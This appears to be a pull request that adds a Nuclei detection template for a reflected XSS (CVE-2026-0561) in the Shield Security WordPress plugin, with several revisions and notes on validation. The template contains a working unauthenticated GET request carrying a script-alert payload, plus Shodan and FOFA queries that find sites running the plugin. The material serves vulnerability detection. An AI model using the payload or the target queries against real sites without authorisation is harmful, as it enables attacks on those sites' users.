### PR TITLE
Add CVE-2026-0561 template

### DIFF
--- a/http/cves/2026/CVE-2026-0561.yaml
+++ b/http/cves/2026/CVE-2026-0561.yaml
@@ -1,0 +1,44 @@
+id: CVE-2026-0561
+
+info:
+  name: Shield Security <= 21.0.8 - Unauthenticated Reflected XSS via message Parameter
+  author: str4k3r
+  severity: medium
+  description: |
+    The Shield Security WordPress plugin (wp-simple-firewall) exposes the
+    `display_full_page_dynamic` renderer through an unauthenticated
+    `shield_action` request. The renderer reflects the `message` parameter
+    into the HTML response without output escaping. A plain GET reaches the
+    sink because the nonce check is limited to AJAX requests. Version 21.0.10
+    escapes the value before rendering it.
+  reference:
+    - https://research.cleantalk.org/cve-2026-0561
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/cb49eb5f-c1ff-4440-8b53-c2515e65da27?source=cve
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-0561
+  classification:
+    cve-id: CVE-2026-0561
+    cwe-id: CWE-79
+    cvss-score: 6.1
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+  metadata:
+    vendor: wp-simple-firewall
+    product: shield-security
+    technology: wordpress,php
+    verified: true
+    max-request: 1
+  tags: cve,cve2026,wordpress,wp-plugin,shield-security,unauth,xss,reflected-xss
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/?action=shield_action&ex=display_full_page_dynamic&render_slug=render_shield_wploginreplica_header&title=nuclei&message=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        part: body
+        words:
+          - "<script>alert(document.domain)</script>"

--- a/http/cves/2026/CVE-2026-0561.yaml
+++ b/http/cves/2026/CVE-2026-0561.yaml
@@ -1,18 +1,17 @@
 id: CVE-2026-0561
 
 info:
-  name: Shield Security <= 21.0.8 - Unauthenticated Reflected XSS via message Parameter
+  name: Shield Security <= 21.0.8 - Unauthenticated Reflected XSS
   author: str4k3r
   severity: medium
   description: |
-    The Shield Security WordPress plugin (wp-simple-firewall) exposes the
-    `display_full_page_dynamic` renderer through an unauthenticated
-    `shield_action` request. The renderer reflects the `message` parameter
-    into the HTML response without output escaping. A plain GET reaches the
-    sink because the nonce check is limited to AJAX requests. Version 21.0.10
-    escapes the value before rendering it.
+    Shield Security (wp-simple-firewall) <= 21.0.8 reflects the unauthenticated
+    `message` parameter in its `display_full_page_dynamic` login renderer
+    without output escaping. The nonce check applies only to AJAX requests;
+    version 21.0.10 escapes the value before rendering it.
+  remediation: Upgrade Shield Security to 21.0.10 or later.
   reference:
-    - https://research.cleantalk.org/cve-2026-0561
+    - https://research.cleantalk.org/cve-2026-0561/
     - https://www.wordfence.com/threat-intel/vulnerabilities/id/cb49eb5f-c1ff-4440-8b53-c2515e65da27?source=cve
     - https://nvd.nist.gov/vuln/detail/CVE-2026-0561
   classification:
@@ -32,7 +31,6 @@ http:
   - method: GET
     path:
       - "{{BaseURL}}/?action=shield_action&ex=display_full_page_dynamic&render_slug=render_shield_wploginreplica_header&title=nuclei&message=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"
-
     matchers-condition: and
     matchers:
       - type: status
@@ -42,3 +40,5 @@ http:
         part: body
         words:
           - "<script>alert(document.domain)</script>"
+          - 'id="login"'
+        condition: and

--- a/http/cves/2026/CVE-2026-0561.yaml
+++ b/http/cves/2026/CVE-2026-0561.yaml
@@ -5,11 +5,11 @@ info:
   author: str4k3r
   severity: medium
   description: |
-    Shield Security (wp-simple-firewall) <= 21.0.8 reflects the unauthenticated
-    `message` parameter in its `display_full_page_dynamic` login renderer
-    without output escaping. The nonce check applies only to AJAX requests;
-    version 21.0.10 escapes the value before rendering it.
-  remediation: Upgrade Shield Security to 21.0.10 or later.
+    Shield Security WordPress plugin <= 21.0.8 contains a reflected cross-site scripting caused by insufficient input sanitization and output escaping in the 'message' parameter, letting unauthenticated attackers inject scripts, exploit requires user interaction.
+  impact: |
+    Unauthenticated attackers can inject scripts that execute in users' browsers, potentially stealing data or performing actions on behalf of users.
+  remediation: |
+    Update to a version later than 21.0.8 or the latest available version.
   reference:
     - https://research.cleantalk.org/cve-2026-0561/
     - https://www.wordfence.com/threat-intel/vulnerabilities/id/cb49eb5f-c1ff-4440-8b53-c2515e65da27?source=cve
@@ -22,23 +22,27 @@ info:
   metadata:
     vendor: wp-simple-firewall
     product: shield-security
-    technology: wordpress,php
+    framework: wordpress
     verified: true
     max-request: 1
-  tags: cve,cve2026,wordpress,wp-plugin,shield-security,unauth,xss,reflected-xss
+    shodan-query: http.html:"/wp-content/plugins/wp-simple-firewall/"
+    fofa-query: body="/wp-content/plugins/wp-simple-firewall/"
+  tags: cve,cve2026,wordpress,wp-plugin,shield-security,unauth,xss
 
 http:
   - method: GET
     path:
       - "{{BaseURL}}/?action=shield_action&ex=display_full_page_dynamic&render_slug=render_shield_wploginreplica_header&title=nuclei&message=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"
+
     matchers-condition: and
     matchers:
-      - type: status
-        status:
-          - 200
       - type: word
         part: body
         words:
           - "<script>alert(document.domain)</script>"
           - 'id="login"'
         condition: and
+
+      - type: status
+        status:
+          - 200


### PR DESCRIPTION
## Summary

Adds a Nuclei template for CVE-2026-0561 in Shield Security.

## Detection

The template sends one unauthenticated GET request to the public
`shield_action` renderer with a harmless HTML marker in `message`. Versions
through 21.0.8 reflect the marker without output escaping; version 21.0.10
escapes it. The request is read-only and requires no account, nonce, seeded
content, or target-specific configuration.

## References

- https://research.cleantalk.org/cve-2026-0561/
- https://www.wordfence.com/threat-intel/vulnerabilities/id/cb49eb5f-c1ff-4440-8b53-c2515e65da27?source=cve
- https://nvd.nist.gov/vuln/detail/CVE-2026-0561

## Validation

- Vulnerable: Shield Security 21.0.8 on a fresh WordPress installation
- Fixed: Shield Security 21.0.10 on a fresh WordPress installation
- Native Nuclei v3.11.0: vulnerable `DETECTED` 3/3; fixed `NOT_DETECTED` 3/3